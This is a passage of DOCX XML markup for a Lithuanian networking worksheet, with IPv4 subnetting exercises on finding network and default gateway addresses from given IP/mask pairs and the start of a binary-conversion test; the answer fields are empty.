          <w:p w14:paraId="5850D329" w14:textId="6DEF8626" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ko</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>kį</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>tinklo adres</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ą priskiriate</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>kompiuteriui PC-B?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2FC1A1B0" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="56ADD341" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CA52363" w14:textId="54652AF6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00915591" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kokiame tinkle yra abu kompiuteriai? Ar</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>gali vienas su kitu komunikuoti tiesiogiai? Pakomentuokite kodėl?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="464B6D53" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="2BA94FFB" w14:textId="77777777" w:rsidTr="00332B40">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2572" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="658E571A" w14:textId="5BC2411B"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Koks </w:t>
            </w:r>
            <w:r w:rsidR="00C57442" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>di</w:t>
            </w:r>
            <w:r w:rsidR="00332B40" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>džiausias</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> IP adresas gali būti suteiktas PC-B, kad jis būtų tame pačiame tinkle</w:t>
            </w:r>
            <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>kaip ir PC-A?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2428" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="20B06F44" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="196E2694" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CABFCD" w14:textId="5D83DBC5" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IPV4 ADRESŲ SKAIČIAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CF29D" w14:textId="3395B565" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">UŽDUOTIES SĄLYGA: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nustatykite numatytojo šliuzo (angl. </w:t>
      </w:r>
      <w:r w:rsidR="00F500C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Default Gateway) IP adresą pagal</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pateiktą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scenarijų.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B0C7EA" w14:textId="1B1F0E2E" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Įmonė</w:t>
      </w:r>
      <w:r w:rsidR="00915591" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tinklo administratorius laikosi taisyklės, kad Default Gateway IP adresas yra visada pirmas naudojamoje LAN tinklo atestacijoje. Situacija: įrenginys turi IP adresą 172.16.140.24 ir tinklo kaukę 255.255.192.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5906549F" w14:textId="1C2ECABA" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite, k</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oks šio tinklo IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="291D7BBA" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62E93EDC" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B20676F" w14:textId="02FA1CA3" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite, k</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oks šio tinklo Default Gateway IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="391FABD0" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552CF77F"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bl>
    <w:p w14:paraId="0F0F1AE4" w14:textId="113F3087" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03CB60AC" w14:textId="34021727" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Įmonė</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tinklo administratorius laikosi taisyklės, kad Default Gateway IP adresas yra visada pirmas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>naudojamoje LAN tinklo atestacijoje. Situacija: įrenginys turi IP adresą 192.168.184.227 ir tinklo kaukę 255.255.255.248.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82A4A1" w14:textId="189392C6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nustatykite, </w:t>
      </w:r>
      <w:r w:rsidR="003B60A5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oks šio tinklo IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="21EB9FED" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10067" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F29FDD" w14:textId="77777777" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67631B3D" w14:textId="3A5F5FB8" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00575225" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nustatykite, k</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oks šio tinklo Default Gateway IP adresas? </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="720" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9191"/>
      </w:tblGrid>
      <w:tr w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w14:paraId="3823299F" w14:textId="77777777" w:rsidTr="009D5F8C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6018F2B0"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 xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="380090E1" w14:textId="40AD2A71" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C2D298" w14:textId="11A443E3" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C"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1</w:t>
      </w:r>
      <w:r w:rsidR="00683BC8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="003B7F5A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">IPV4 ADRESŲ SKAIČIAVIMAS. </w:t>
      </w:r>
      <w:r w:rsidR="00C25BA0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56591501" w14:textId="77777777" w:rsidR="003B60A5" w:rsidRPr="005A5C28" w:rsidRDefault="003B60A5" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3515D64E" w14:textId="32C23281" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Skaičių 255 paverskite į dvejetainę sistemą.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB0D87" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>Pažymėkite</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> k</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>uris</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve">pateiktas </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>atsakymas</w:t>
      </w:r>
      <w:r w:rsidR="00575225" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
